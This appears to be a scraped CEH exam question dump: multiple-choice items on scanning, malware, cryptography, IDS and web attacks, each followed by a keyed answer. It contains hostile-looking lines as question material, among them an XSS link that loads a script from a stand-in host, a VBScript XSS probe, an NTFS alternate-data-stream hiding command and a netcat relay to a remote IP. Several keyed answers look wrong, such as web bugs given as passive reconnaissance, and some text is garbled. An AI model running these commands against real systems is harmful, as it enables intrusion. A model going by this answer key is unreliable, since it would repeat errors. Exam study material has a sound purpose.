c. A zone transfer

Attackers send an ACK probe packet with random sequence number, no response means port is filtered (Stateful firewall is present) and RST response means the port is not filtered. What type of Port Scanning is this? a. RST flag scanning b. SYN flag scanning c. ACK flag scanning d. FIN flag scanning

c. ACK flag scanning

Michael is a junior security analyst working for the National Security Agency (NSA) working primarily on breaking terrorist encrypted messages. The NSA has a number of methods they use to decipher encrypted messages including Government Access to Keys (GAK) and inside informants. The NSA holds secret backdoor keys to many of the encryption algorithms used on the Internet. The problem for the NSA, and Michael, is that terrorist organizations are starting to use custom-built algorithms or obscure algorithms purchased from corrupt governments. For this reason, Michael and other security analysts like him have been forced to find different methods of deciphering terrorist messages. One method that Michael thought of using was to hide malicious code inside seemingly harmless programs. Michael first monitors sites and bulletin boards used by known terrorists, and then he is able to glean email addresses to some of these suspected terrorists. Michael then inserts a stealth keylogger into a mapping program file readme.txt and then sends that as an attachment to the terrorist. This keylogger takes screenshots every 2 minutes and also logs all keyboard activity into a hidden file on the terrorist's computer. Then, the keylogger emails those files to Michael twice a day with a built in SMTP server. What technique has Michael used to disguise this keylogging software? a. Wrapping b. Steganography c. ADS d. Hidden Channels

c. ADS

What file system vulnerability does the following command take advantage of? type c:\anyfile.exe > c:\winnt\system32\calc.exe:anyfile.exe a. HFS b. XFS c. ADS d. Backdoor access

c. ADS

Your lab partner is trying to find out more information about a competitors web site. The site has a .com extension. She has decided to use some online whois tools and look in one of the regional Internet registrys. Which one would you suggest she looks in first? a. AfriNIC b. APNIC c. ARIN d. LACNIC e. RIPE

c. ARIN

Which type of sniffing technique is generally referred as MiTM attack? Picture: (Test 2 #100) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-186.gif a. Mac Flooding b. DHCP Sniffing c. ARP Poisoning d. Password Sniffing

c. ARP Poisoning

Why do you need to capture five to ten million packets in order to crack WEP with AirSnort? a. All IVs are vulnerable to attack b. Air Snort uses a cache of packets c. Air Snort implements the FMS attack and only encrypted packets are counted d. A majority of weak IVs transmitted by access points and wireless cards are not filtered by contemporary wireless manufacturers

c. Air Snort implements the FMS attack and only encrypted packets are counted

__________ is found in all versions of NTFS and is described as the ability to fork file data into existing files without affecting their functionality, size, or display to traditional file browsing utilities like dir or Windows Explorer a. Merge Streams b. NetBIOS vulnerability c. Alternate Data Streams d. Steganography

c. Alternate Data Streams

The use of alert thresholding in an IDS can reduce the volume of repeated alerts, but introduces which of the following vulnerabilities? a. The IDS will not distinguish among packets originating from different sources. b. Thresholding interferes with the IDS' ability to reassemble fragmented packets. c. An attacker,working slowly enough,can evade detection by the IDS. d. Network packets are dropped if the volume exceeds the threshold.

c. An attacker,working slowly enough,can evade detection by the IDS.

Which of the following is NOT true of cryptography? a. Method of storing and transmitting data in a form that only those it is intended for can read and process b. Science of protecting information by encoding it into an unreadable format c. An effective way of protecting sensitive information in storage but not in transit d. Most (if not all) algorithms can be broken by both technical and non-technical means

c. An effective way of protecting sensitive information in storage but not in transit

How can a rootkit bypass Windows 7 operating system's kernel mode, code signing policy? a. Replacing patch system calls with its own version that hides the rootkit (attacker's) actions b. Performing common services for the application process and replacing real applications with fake ones c. Attaching itself to the master boot record in a hard drive and changing the machine's boot sequence/options d. Defeating the scanner from detecting any code change at the kernel

c. Attaching itself to the master boot record in a hard drive and changing the machine's boot sequence/options

A Security Engineer at a medium-sized accounting firm has been tasked with discovering how much information can be obtained from the firm's public facing web servers. The engineer decides to start by using netcat to port 80. The engineer receives this output: HTTP/1.1 200 OK Server: Microsoft-IIS/6 Expires: Tue, 17 Jan 2011 01:41:33 GMT DatE. Mon, 16 Jan 2011 01:41:33 GMT Content-TypE. text/html Accept-Ranges: bytes Last-Modified. Wed, 28 Dec 2010 15:32:21 GMT ETaG. "b0aac0542e25c31:89d" Content-Length: 7369 Which of the following is an example of what the engineer performed? a. Cross-site scripting b. SQL injection c. Banner grabbing d. Whois database query

c. Banner grabbing

Advanced encryption standard is an algorithm used for which of the following? a. Data integrity b. Key discovery c. Bulk data encryption d. Key recovery

c. Bulk data encryption

An attacker has been successfully modifying the purchase price of items purchased on the company's web site. The security administrators verify the web server and Oracle database have not been compromised directly. They have also verified the Intrusion Detection System (IDS) logs and found no attacks that could have caused this. What is the mostly likely way the attacker has been able to modify the purchase price? a. By using SQL injection b. By using cross site scripting c. By changing hidden form values d. By utilizing a buffer overflow attack

c. By changing hidden form values

How can a policy help improve an employee's security awareness? a. By sharing security secrets with employees, enabling employees to share secrets, and establishing a consultative help line b. By decreasing an employee's vacation time, addressing ad-hoc employment clauses, and ensuring that managers know employee strengths c. By implementing written security procedures,enabling employee security training,and promoting the benefits of security d. By using informal networks of communication, establishing secret passing procedures, and immediately terminating employees

c. By implementing written security procedures,enabling employee security training,and promoting the benefits of security

Which of the following is the best way an attacker can passively learn about technologies used in an organization? _____ a. By webcrawling the organization web site b. By searching regional newspapers and job databases for skill sets technology hires need to possess in the organization c. By sending web bugs to key personnel d. By performing a port scan on the organization's web site

c. By sending web bugs to key personnel

Which of the following programming languages is most vulnerable to buffer overflow attacks? a. Perl b. Java c. C++ d. Python

c. C++

A hacker searches in Google for filetype:pcf to find Cisco VPN config files. Those files may contain connectivity passwords that can be decoded with which of the following? a. Cupp b. Nessus c. Cain and Abel d. John The Ripper Pro

c. Cain and Abel

Which of the following are password cracking tools? (Choose three.) a. Nikto b. Havij c. Cain and Abel d. KerbCrack e. BTCrack f. John the Ripper

c. Cain and Abel d. KerbCrack f. John the Ripper

An organization hires a tester to do a wireless penetration test. Previous reports indicate that the last test did not contain management or control packets in the submitted traces. Which of the following is the most likely reason for lack of management or control packets? a. The wrong network card drivers were in use by Wireshark. b. The wireless card was not turned on. c. Certain operating systems and adapters do not collect the management or control packets. d. On Linux and Mac OS X,only 802.11 headers are received in promiscuous mode.

c. Certain operating systems and adapters do not collect the management or control packets.

Charlie is the network administrator for his company. Charlie just received a new Cisco router and wants to test its capabilities out and to see if it might be susceptible to a DoS attack resulting in its locking up. The IP address of the Cisco switch is 172.16.0.45. What command can Charlie use to attempt this task? a. By using the command ping 172.16.0.45 Charlie would be able to lockup the router b. Charlie can try using the command ping 56550 172.16.0.45 c. Charlie can use the command ping -l 56550 172.16.0.45 -t d. He could use the command ping -4 56550 172.16.0.45.

c. Charlie can use the command ping -l 56550 172.16.0.45 -t

While conducting a penetration test, the tester determines that there is a firewall between the tester's machine and the target machine. The firewall is only monitoring TCP handshaking of packets at the session layer of the OSI model. Which type of firewall is the tester trying to traverse? a. Application-level firewall b. Packet filtering firewall c. Circuit-level gateway firewall d. Stateful multilayer inspection firewall

c. Circuit-level gateway firewall

John wishes to install a new application onto his Windows 2000 server. He wants to ensure that any application he uses has not been Trojaned. What can he do to help ensure this? a. Obtain the application from a CD-ROM disc b. Obtain the application via SSL c. Compare the file's MD5 signature with the one published on the distribution media d. Compare the file's virus signature with the one published on the distribution media

c. Compare the file's MD5 signature with the one published on the distribution media

Which of the statements concerning proxy firewalls is correct? a. Proxy firewalls increase the speed and functionality of a network. b. Firewall proxy servers decentralize all activity for an application. c. Computers establish a connection with a proxy firewall which initiates a new network connection for the client. d. Proxy firewalls block network packets from passing to and from a protected network.

c. Computers establish a connection with a proxy firewall which initiates a new network connection for the client.

If a competitor wants to cause damage to your organization, steal critical secrets, or put you out of business, they just have to find a job opening, prepare someone to pass the interview, have that person hired, and they will be in the organization. How would you prevent such type of attacks? a. Investigate their social networking profiles b. Hire the people through third-party job agencies who will vet them for you c. Conduct thorough background checks before you engage them d. It is impossible to block these attacks

c. Conduct thorough background checks before you engage them

Which of the following countermeasure can specifically protect against both the MAC Flood and MAC Spoofing attacks? a. Configure Port Recon on the switch b. Configure Switch Mapping c. Configure Port Security on the switch d. Configure Multiple Recognition on the switch

c. Configure Port Security on the switch

Employees in a company are no longer able to access Internet web sites on their computers. The network administrator is able to successfully ping IP address of web servers on the Internet and is able to open web sites by using an IP address in place of the URL. The administrator runs the nslookup command for www.eccouncil.org and receives an error message stating there is no response from the server. What should the administrator do next? a. Configure the firewall to allow traffic on TCP port 8080. b. Configure the firewall to allow traffic on TCP ports 80 and UDP port 443. c. Configure the firewall to allow traffic on TCP ports 53 and UDP port 53. d. Configure the firewall to allow traffic on TCP port 53.

c. Configure the firewall to allow traffic on TCP ports 53 and UDP port 53.

You are performing a port scan with nmap. You are in hurry and conducting the scans at the fastest possible speed. However, you don't want to sacrifice reliability for speed. If stealth is not an issue, what type of scan should you run to get very reliable results? a. Stealth scan b. XMAS scan c. Connect scan d. Fragmented packet scan

c. Connect scan

When an alert rule is matched in a network-based IDS like snort, the IDS does which of the following? a. Stops checking rules,sends an alert,and lets the packet continue b. Blocks the connection with the source IP address in the packet c. Continues to evaluate the packet until all rules are checked d. Drops the packet and moves on to the next one

c. Continues to evaluate the packet until all rules are checked

An employee wants to defeat detection by a network-based IDS application. He does not want to attack the system containing the IDS application. Which of the following strategies can be used to defeat detection by a network-based IDS application? a. Create a ping flood b. Create multiple false positives c. Create a network tunnel d. Create a SYN flood

c. Create a network tunnel

A pentester is using Metasploit to exploit an FTP server and pivot to a LAN. How will the pentester pivot using Metasploit? a. Issue the pivot exploit and set the meterpreter. b. Set the payload to propagate through the meterpreter. c. Create a route statement in the meterpreter. d. Reconfigure the network settings in the meterpreter.

c. Create a route statement in the meterpreter.

Take a look at the following attack on a Web Server using obstructed URL: Picture: (Test 2 #94) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-185.gif How would you protect from these attacks? a. Configure the Web Server to deny requests involving "hex encoded" characters b. Enable Active Scripts Detection at the firewall and routers c. Create rules in IDS to alert on strange Unicode requests d. Use SSL authentication on Web Servers

c. Create rules in IDS to alert on strange Unicode requests

This kind of attack will let you assume a users identity at a dynamically generated web page or site: a. Session Hijacking b. Zone Transfer c. Cross Site Scripting d. SQL Injection

c. Cross Site Scripting

Your XYZ trainee Sandra asks you which are the four existing Regional Internet Registry (RIR's)? a. APNIC, PICNIC, ARIN, LACNIC b. RIPE NCC, ARIN, APNIC, LATNIC c. RIPE NCC, NANIC, ARIN, APNIC d. RIPE NCC, LACNIC, ARIN, APNIC

d. RIPE NCC, LACNIC, ARIN, APNIC

A security analyst in an insurance company is assigned to test a new web application that will be used by clients to help them choose and apply for an insurance plan. The analyst discovers that the application is developed in ASP scripting language and it uses MSSQL as a database backend. The analyst locates the application's search form and introduces the following code in the search input field. IMG SRC=vbscript:msgbox("Vulnerable");> originalAttribute="SRC" originalPath="vbscript:msgbox("Vulnerable");>" When the analyst submits the form, the browser returns a pop-up window that says "Vulnerable". Which web applications vulnerability did the analyst discover? a. Cross-site request forgery b. SQL injection c. Cross-site scripting d. Command injection

c. Cross-site scripting

This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes un-sanitized user-provided data. <ahref="http://foobar.com/index.html?id=%3Cscript%22http://baddomian.com/badscript.js%22%3E/script%E>See foobar </a> What is this attack? a. SQL Injection b. URL Traversal attack c. Cross-site-scripting attack d. Buffer Overflow attack

c. Cross-site-scripting attack

You are attempting to crack LM Manager hashed from Windows 2000 SAM file. You will be using LM Brute force hacking tool for decryption. What encryption algorithm will you be decrypting? a. SHA b. SSL c. DES d. MD4

c. DES

In the OSI model, where does PPTP encryption take place? a. Application layer b. Network layer c. Data link layer d. Transport layer

c. Data link layer

David is a security administrator working in Boston. David has been asked by the office's manager to block all POP3 traffic at the firewall because he believes employees are spending too much time reading personal email. How can David block POP3 at the firewall? a. David can stop POP3 traffic by blocking all HELO requests that originate from inside the office. b. David can block port 125 at the firewall. c. David can block port 110 to block all POP3 traffic. d. David can block all EHLO requests that originate from inside the office.

c. David can block port 110 to block all POP3 traffic.

Which security strategy requires using several, varying methods to protect IT systems against attacks? a. Three-way handshake b. Covert channels c. Defense in depth d. Exponential backoff algorithm

c. Defense in depth

What does a type 3 code 13 represent?(Choose two.) a. Echo request b. Port unreachable c. Destination unreachable d. Administratively prohibited e. Network unreachable f. Time exceeded

c. Destination unreachable d. Administratively prohibited

LM authentication is not as strong as Windows NT authentication so you may want to disable its use, because an attacker eavesdropping on network traffic will attack the weaker protocol. A successful attack can compromise the user's password. How do you disable LM authentication in Windows XP? a. Stop the LM service in Windows XP b. Download and install LMSHUT.EXE tool from Microsoft website c. Disable LM authentication in the registry d. Disable LSASS service in Windows XP

c. Disable LM authentication in the registry

What type of attack is shown here? Picture: (Test 2 #96) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-198.gif a. Cluster Service Attack b. Bandwidth exhaust Attack c. Distributed Denial of Service Attack d. Denial of Service Attack

c. Distributed Denial of Service Attack

Which of the following statements are true regarding N-tier architecture? (Choose two.) a. The N-tier architecture must have at least one logical layer. b. When a layer is changed or updated,the other layers must also be recompiled or modified. c. Each layer must be able to exist on a physically independent system. d. Each layer should exchange information only with the layers above and below it.

c. Each layer must be able to exist on a physically independent system. d. Each layer should exchange information only with the layers above and below it.

How do employers protect assets with security policies pertaining to employee surveillance activities? a. Employers use informal verbal communication channels to explain employee monitoring activities to employees. b. Employers use network surveillance to monitor employee email traffic, network access, and to record employee keystrokes. c. Employers provide employees written statements that clearly discuss the boundaries of monitoring activities and consequences. d. Employers promote monitoring activities of employees as long as the employees demonstrate trustworthiness.

c. Employers provide employees written statements that clearly discuss the boundaries of monitoring activities and consequences.

Attacking well-known system defaults is one of the most common hacker attacks. Most software is shipped with a default configuration that makes it easy to install and setup the application. You should change the default settings to secure the system. Which of the following is NOT an example of default installation? a. Often,the default location of installation files can be exploited which allows a hacker to retrieve a file from the system b. Many systems come with default user accounts with well-known passwords that administrators forget to change c. Enabling firewall and anti-virus software on the local system d. Many software packages come with "samples" that can be exploited,such as the sample programs on IIS web services

c. Enabling firewall and anti-virus software on the local system

You are the Security Administrator of Xtrinity, Inc. You write security policies and conduct assessments to protect the company's network. During one of your periodic checks to see how well policy is being observed by the employees, you discover an employee has attached cell phone 3G modem to his telephone line and workstation. He has used this cell phone 3G modem to dial in to his workstation, thereby bypassing your firewall. A security breach has occurred as a direct result of this activity. The employee explains that he used the modem because he had to download software for a department project. How would you resolve this situation? a. Reconfigure the firewall b. Conduct a needs analysis c. Enforce the corporate security policy d. Install a network-based IDS

c. Enforce the corporate security policy

You may be able to identify the IP addresses and machine names for the firewall, and the names of internal mail servers by: a. Sending a mail message to an invalid address on the target network,and examining the header information generated by the POP servers b. Examining the SMTP header information generated by using the -mx command parameter of DIG c. Examining the SMTP header information generated in response to an e-mail message sent to an invalid address d. Sending a mail message to a valid address on the target network,and examining the header information generated by the IMAP servers

c. Examining the SMTP header information generated in response to an e-mail message sent to an invalid address

What type of port scan is shown below? Scan directed at open port: client server 192.5.2.92:4079--------FIN-------->192.5.2.110:23 192.5.2.92:4079<----NO RESPONSE------192.5.2.110:23 Scan directed at close port: client server 192.5.2.92:4079--------FIN-------->192.5.2.110:23 192.5.2.92:4079<-----RST/ACK---------192.5.2.110:23 a. Idle Scan b. Windows Scan c. FIN Scan d. XMAS Scan

c. FIN Scan

A network administrator received an administrative alert at 3:00 a.m. from the intrusion detection system. The alert was generated because a large number of packets were coming into the network over ports 20 and 21. During analysis, there were no signs of attack on the FTP servers. How should the administrator classify this situation? a. True negatives b. True positives c. False positives d. False negatives

c. False positives

Most NIDS systems operate in layer 2 of the OSI model. These systems feed raw traffic into a detection engine and rely on the pattern matching and/or statistical analysis to determine what is malicious. Packets are not processed by the host's TCP/IP stack allowing the NIDS to analyze traffic the host would otherwise discard. Which of the following tools allows an attacker to intentionally craft packets to confuse pattern-matching NIDS systems, while still being correctly assembled by the host TCP/IP stack to render the attack payload? a. Defrag b. Tcpfrag c. Fragroute d. Tcpdump

c. Fragroute

You have just received an assignment for an assessment at a company site. Company's management is concerned about external threat and wants to take appropriate steps to insure security is in place. Anyway the management is also worried about possible threats coming from inside the site, specifically from employees belonging to different Departments. What kind of assessment will you be performing ? a. Black box testing b. White box testing c. Gray box testing d. Black hat testing e. White hat testing f. Gray hat testing

c. Gray box testing

Which of the following keyloggers cannot be detected by anti-virus or anti-spyware products? a. Covert keylogger b. Stealth keylogger c. Hardware keylogger d. Software keylogger

c. Hardware keylogger

Bob is doing a password assessment for one of his clients. Bob suspects that security policies are not in place. He also suspects that weak passwords are probably the norm throughout the company he is evaluating. Bob is familiar with password weaknesses and key loggers. Which of the following options best represents the means that Bob can adopt to retrieve passwords from his clients hosts and servers? a. Hardware and Software Keyloggers. b. Passwords are always best obtained using Hardware key loggers. c. Hardware, Software,and Sniffing. d. Software only,they are the most effective.

c. Hardware, Software,and Sniffing.

Hayden is the network security administrator for her company, a large finance firm based in Miami. Hayden just returned from a security conference in Las Vegas where they talked about all kinds of old and new security threats; many of which she did not know of. Hayden is worried about the current security state of her company's network so she decides to start scanning the network from an external IP address. To see how some of the hosts on her network react, she sends out SYN packets to an IP range. A number of IPs responds with a SYN/ACK response. Before the connection is established she sends RST packets to those hosts to stop the session. She does this to see how her intrusion detection system will log the traffic. What type of scan is Hayden attempting here? a. The type of scan,she is using is called a NULL scan b. Hayden is attempting to find live hosts on her company's network by using an XMAS scan c. Hayden is using a half-open scan to find live hosts on her network d. She is utilizing a SYN scan to find live hosts that are listening on her network

c. Hayden is using a half-open scan to find live hosts on her network

A file integrity program such as Tripwire protects against Trojan horse attacks by: a. Rejecting packets generated by Trojan horse programs b. Automatically deleting Trojan horse programs c. Helping you catch unexpected changes to a system utility file that might indicate it had been replaced by a Trojan horse d. Using programming hooks to inform the kernel of Trojan horse behavior

c. Helping you catch unexpected changes to a system utility file that might indicate it had been replaced by a Trojan horse

Henry is an attacker and wants to gain control of a system and use it to flood a target system with requests, so as to prevent legitimate users from gaining access. What type of attack is Henry using? a. Henry is executing commands or viewing data outside the intended target path b. Henry is taking advantage of an incorrect configuration that leads to access with higher-than expected privilege c. Henry is using a denial of service attack which is a valid threat used by an attacker d. Henry uses poorly designed input validation routines to create or alter commands to gain access to unintended data or execute commands

c. Henry is using a denial of service attack which is a valid threat used by an attacker

What is Hunt used for? a. Hunt is used to hack web servers b. Hunt is used to footprint networks c. Hunt is used to intercept traffic i.e. man-in-the-middle traffic d. Hunt is used to sniff traffic e. Hunt is used for password cracking

c. Hunt is used to intercept traffic i.e. man-in-the-middle traffic

In the context of password security: a simple dictionary attack involves loading a dictionary file (a text file full of dictionary words) into a cracking application such as L0phtCrack or John the Ripper, and running it against user accounts located by the application. The larger the word and word fragment selection, the more effective the dictionary attack is. The brute force method is the most inclusive - though slow. Usually, it tries every possible letter and number combination in its automated exploration. If you would use both brute force and dictionary combined together to have variations of words, what would you call such an attack? a. Full Blown Attack b. Thorough Attack c. Hybrid Attack d. BruteDict Attack

c. Hybrid Attack

You have retrieved the raw hash values from a Windows 2000 Domain Controller. Using social engineering, you come to know that they are enforcing strong passwords. You understand that all users are required to use passwords that are at least 8 characters in length. All passwords must also use of the 4 following categories: lower case letters, capital letters, numbers and special characters. With your existing knowledge of users, likely user account names and the possibility that they will choose the easiest passwords possible, what would be the fastest type of password cracking attack you can run against these hash values and still get results? a. Dictionary Attack b. Online Attack c. Hybrid Attack d. Brute Force Attack

c. Hybrid Attack

Because UDP is a connectionless protocol: (Select 2) a. It can only be used for Connect scans b. UDP recvfrom() and write() scanning will yield reliable results c. ICMP port unreachable messages may not be returned successfully d. It can only be used for SYN scans e. There is no guarantee that the UDP packets will arrive at their destination

c. ICMP port unreachable messages may not be returned successfully e. There is no guarantee that the UDP packets will arrive at their destination

This packet was taken from a packet sniffer that monitors a Web server. Picture: (Test 8 #30) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-730.gif This packet was originally 1514 bytes long, but only the first 512 bytes are shown here. This is the standard hexdump representation of a network packet, before being decoded. A hexdump has three columns: the offset of each line, the hexadecimal data, and the ASCII equivalent. This packet contains a 14-byte Ethernet header, a 20-byte IP header, a 20-byte TCP header, an HTTP header ending in two line-feeds (0D 0A 0D 0A) and then the data. By examining the packet identify the name and version of the Web server? a. Apache 1.2 b. IIS 5.0 c. IIS 4.0 d. Linux WServer 2.3

c. IIS 4.0

What port scanning method involves sending spoofed packets to a target system and then looking for adjustments to the IPID on a zombie system? a. Bounce Scanning b. Blind Port Scanning c. Idle Scanning d. Stealth Scanning e. UDP Scanning

c. Idle Scanning

Jason works in the sales and marketing department for a very large advertising agency located in Atlanta. Jason is working on a very important marketing campaign for his company's largest client. Before the project could be completed and implemented, a competing advertising company comes out with the exact same marketing materials and advertising, thus rendering all the work done for Jason's client unusable. Jason is questioned about this and says he has no idea how all the material ended up in the hands of a competitor. Without any proof, Jason's company cannot do anything except move on. After working on another high profile client for about a month, all the marketing and sales material again ends up in the hands of another competitor and is released to the public before Jason's company can finish the project. Once again, Jason says that he had nothing to do with it and does not know how this could have happened. Jason is given leave with pay until they can figure out what is going on. Jason's supervisor decides to go through his email and finds a number of emails that were sent to the competitors that ended up with the marketing material. The only items in the emails were attached jpg files, but nothing else. Jason's supervisor opens the picture files, but cannot find anything out of the ordinary with them. What technique has Jason most likely used? a. Snow Hiding Technique b. ADS Streams Technique c. Image Steganography Technique d. Stealth Rootkit Technique

c. Image Steganography Technique

Every company needs a formal written document which spells out to employees precisely what they are allowed to use the company's systems for, what is prohibited, and what will happen to them if they break the rules. Two printed copies of the policy should be given to every employee as soon as possible after they join the organization. The employee should be asked to sign one copy, which should be safely filed by the company. No one should be allowed to use the company's computer systems until they have signed the policy in acceptance of its terms. What is this document called? a. Information Audit Policy (IAP) b. Penetration Testing Policy (PTP) c. Information Security Policy (ISP) d. Company Compliance Policy (CCP)

c. Information Security Policy (ISP)

What is the best means of prevention against viruses? a. Remove any external devices such as floppy and USB connectors. b. Install a rootkit detection tool. c. Install and update anti-virus scanner. d. Assign read only permission to all files on your system.

c. Install and update anti-virus scanner.

Web servers are often the most targeted and attacked hosts on organizations' networks. Attackers may exploit software bugs in the Web server, underlying operating system, or active content to gain unauthorized access. Picture: (Test 3 #18) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-217.gif Identify the correct statement related to the above Web Server installation? a. Unpatched security flaws in the server software,OS and applications b. Lack of proper security policy,procedures and maintenance c. Installing the server with default settings d. Bugs in server software,OS and web applications

c. Installing the server with default settings

Which of the following techniques will identify if computer files have been changed? a. Permission sets b. Firewall alerts c. Integrity checking hashes d. Network sniffing

c. Integrity checking hashes

When referring to the Domain Name Service, what is denoted by a 'zone'? a. It is a collection of domains. b. It is the first resource record type in the SO{ c. It is a collection of resource records. d. It is the first domain that belongs to a company.

c. It is a collection of resource records.

If you perform a port scan with a TCP ACK packet, what should an OPEN port return? a. SYN/ACK b. FIN c. No Reply d. RST

d. RST

Erik notices a big increase in UDP packets sent to port 1026 and 1027 occasionally. He enters the following at the command prompt. $ nc -l -p 1026 -u -v In response, he sees the following message. cell(?(c)????STOPALERT77STOP! WINDOWS REQUIRES IMMEDIATE ATTENTION. Windows has found 47 Critical Errors. To fix the errors please do the following: 1. Download Registry Repair from: www.reg-patch.com 2. Install Registry Repair 3. Run Registry Repair 4. Reboot your computer FAILURE TO ACT NOW MAY LEAD TO DATA LOSS AND CORRUPTION! What would you infer from this alert? a. It is a genuine fault of windows registry and the registry needs to be backed up b. An attacker has compromised the machine and backdoored ports 1026 and 1027 c. It is a messenger spam. Windows creates a listener on one of the low dynamic ports from 1026 to 1029 and the message usually promotes malware disguised as legitimate utilities d. The machine is redirecting traffic to www.reg-patch.com using adware

c. It is a messenger spam. Windows creates a listener on one of the low dynamic ports from 1026 to 1029 and the message usually promotes malware disguised as legitimate utilities

A rootkit is a collection of tools (programs) that enable administrator-level access to a computer. This program hides itself deep into an operating system for malicious activity and is extremely difficult to detect. The malicious software operates in a stealth fashion by hiding its files, processes and registry keys and may be used to create a hidden directory or folder designed to keep out of view from a user's operating system and security software. Picture: (Test 1 #65) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-064.gif What privilege level does a rootkit require to infect successfully on a Victim's machine? a. User level privileges b. System level privileges c. Kernel level privileges d. Ring 3 Privileges

c. Kernel level privileges

Which of the following describes a component of Public Key Infrastructure (PKI) where a copy of a private key is stored to provide third-party access and to facilitate recovery operations? a. Key registry b. Directory c. Key escrow d. Recovery agent

c. Key escrow

John is discussing security with Jane. Jane had mentioned to John earlier that she suspects an LKM has been installed on her server. She believes this is the reason that the server has been acting erratically lately. LKM stands for Loadable Kernel Module. What does this mean in the context of Linux Security? a. Loadable Kernel Modules are a mechanism for adding functionality to an operating-system kernel after it has been recompiled and the system rebooted. b. Loadable Kernel Modules are a mechanism for adding functionality to a file system without requiring a kernel recompilation. c. Loadable Kernel Modules are a mechanism for adding functionality to an operating-system kernel without requiring a kernel recompilation. d. Loadable Kernel Modules are a mechanism for adding auditing to an operating-system kernel without requiring a kernel recompilation.

c. Loadable Kernel Modules are a mechanism for adding functionality to an operating-system kernel without requiring a kernel recompilation.

Bob is a very security conscious computer user. He plans to test a site that is known to have malicious applets, code, and more. Bob always make use of a basic Web Browser to perform such testing. Which of the following web browser can adequately fill this purpose? a. Mozila b. Internet Explorer c. Lynx d. Tiger

c. Lynx

The Slammer Worm exploits a stack-based overflow that occurs in a DLL implementing the Resolution Service. Which of the following Database Server was targeted by the slammer worm? a. MySQL b. Sybase c. MSSQL d. Oracle e. DB2

c. MSSQL

You want to use netcat to generate huge amount of useless network data continuously for various performance testing between 2 hosts. Which of the following commands accomplish this? a. Machine A nc -l -p 1234 | uncompress -c | tar xvfp Machine B tar cfp - /some/dir | compress -c | nc -w 3 machinea 1234 b. Machine A while true : do nc -v -l -s -p 6000 machineb 2 Machine B while true ; do nc -v -l -s -p 6000 machinea 2 done c. Machine A yes AAAAAAAAAAAAAAAAAAAAAA | nc -v -v -l -p 2222 > /dev/null Machine B #yes BBBBBBBBBBBBBBBBBBBBBB | nc machinea 2222 > /dev/null d. Machine A cat somefile | nc -v -v -l -p 2222 Machine B cat somefile | nc othermachine 2222

c. Machine A yes AAAAAAAAAAAAAAAAAAAAAA | nc -v -v -l -p 2222 > /dev/null Machine B #yes BBBBBBBBBBBBBBBBBBBBBB | nc machinea 2222 > /dev/null

Which definition among those given below best describes a covert channel? a. It is one of the weak channels used by WEP which makes it insecure. b. A server program using a port that is not well known. c. Making use of a protocol in a way it is not intended to be used. d. It is the multiplexing taking place on a communication link.

c. Making use of a protocol in a way it is not intended to be used.

Which definition below best describes a covert channel? a. A server program using a port that is not well known b. It is the multiplexing taking place on a communication link c. Making use of a protocol in a way it was not intended to be used d. It is one of the weak channels used by WEP that makes it insecure

c. Making use of a protocol in a way it was not intended to be used

Which of the following describes the characteristics of a Boot Sector Virus? a. Modifies directory table entries so that directory entries point to the virus code instead of the actual program b. Moves the MBR to another location on the RAM and copies itself to the original location of the MBR c. Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR d. Overwrites the original MBR and only executes the new virus code

c. Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR

Neil is a network administrator working in Istanbul. Neil wants to setup a protocol analyzer on his network that will receive a copy of every packet that passes through the main office switch. What type of port will Neil need to setup in order to accomplish this? a. He will have to setup an Ether channel port to get a copy of all network traffic to the analyzer. b. He should setup a MODS port which will copy all network traffic. c. Neil will need to setup SPAN port that will copy all network traffic to the protocol analyzer. d. Neil will have to configure a Bridged port that will copy all packets to the protocol analyzer.

c. Neil will need to setup SPAN port that will copy all network traffic to the protocol analyzer.

What is the proper response for a FIN scan if the port is closed? a. SYN b. ACK c. FIN d. RST e. PSH

d. RST

What is the outcome of the comm"nc -l -p 2222 | nc 10.1.0.43 1234"? a. Netcat will listen for a connection from 10.1.0.43 on port 1234 and output anything received to port 2222. b. Netcat will listen on the 10.1.0.43 interface for 1234 seconds on port 2222. c. Netcat will listen on port 2222 and output anything received to a remote connection on 10.1.0.43 port 1234. d. Netcat will listen on port 2222 and then output anything received to local interface 10.1.0.43.

c. Netcat will listen on port 2222 and output anything received to a remote connection on 10.1.0.43 port 1234.

June, a security analyst, understands that a polymorphic virus has the ability to mutate and can change its known viral signature and hide from signature-based antivirus programs. Can June use an antivirus program in this case and would it be effective against a polymorphic virus? a. Yes. June can use an antivirus program since it compares the signatures of executable files to the database of known viral signatures and it is very effective against a polymorphic virus b. Yes. June can use an antivirus program since it compares the parity bit of executable files to the database of known check sum counts and it is effective on a polymorphic virus c. No. June can't use an antivirus program since it compares the signatures of executable files to the database of known viral signatures and in the case the polymorphic viruses cannot be detected by a signature-based anti-virus program d. No. June can't use an antivirus program since it compares the size of executable files to the database of known viral signatures and it is effective on a polymorphic virus

c. No. June can't use an antivirus program since it compares the signatures of executable files to the database of known viral signatures and in the case the polymorphic viruses cannot be detected by a signature-based anti-virus program

A computer technician is using a new version of a word processing software package when it is discovered that a special sequence of characters causes the entire computer to crash. The technician researches the bug and discovers that no one else experienced the problem. What is the appropriate next step? a. Create a document that will crash the computer when opened and send it to friends. b. Find an underground bulletin board and attempt to sell the bug to the highest bidder. c. Notify the vendor of the bug and do not disclose it until the vendor gets a chance to issue a fix. d. Ignore the problem completely and let someone else deal with it.

c. Notify the vendor of the bug and do not disclose it until the vendor gets a chance to issue a fix.

Which type of antenna is used in wireless communication? a. Parabolic b. Bi-directional c. Omnidirectional d. Uni-directional

c. Omnidirectional

You have the SOA presented below in your Zone. Your secondary servers have not been able to contact your primary server to synchronize information. How long will the secondary servers attempt to contact the primary server before it considers that zone is dead and stops responding to queries? collegae.edu.SOA, cikkye.edu ipad.college.edu. (200302028 3600 3600 604800 3600) a. One day b. One month c. One week d. One hour

c. One week

Which of the following types of firewall inspects only header information in network traffic? a. Application-level gateway b. Circuit-level gateway c. Packet filter d. Stateful inspection

c. Packet filter

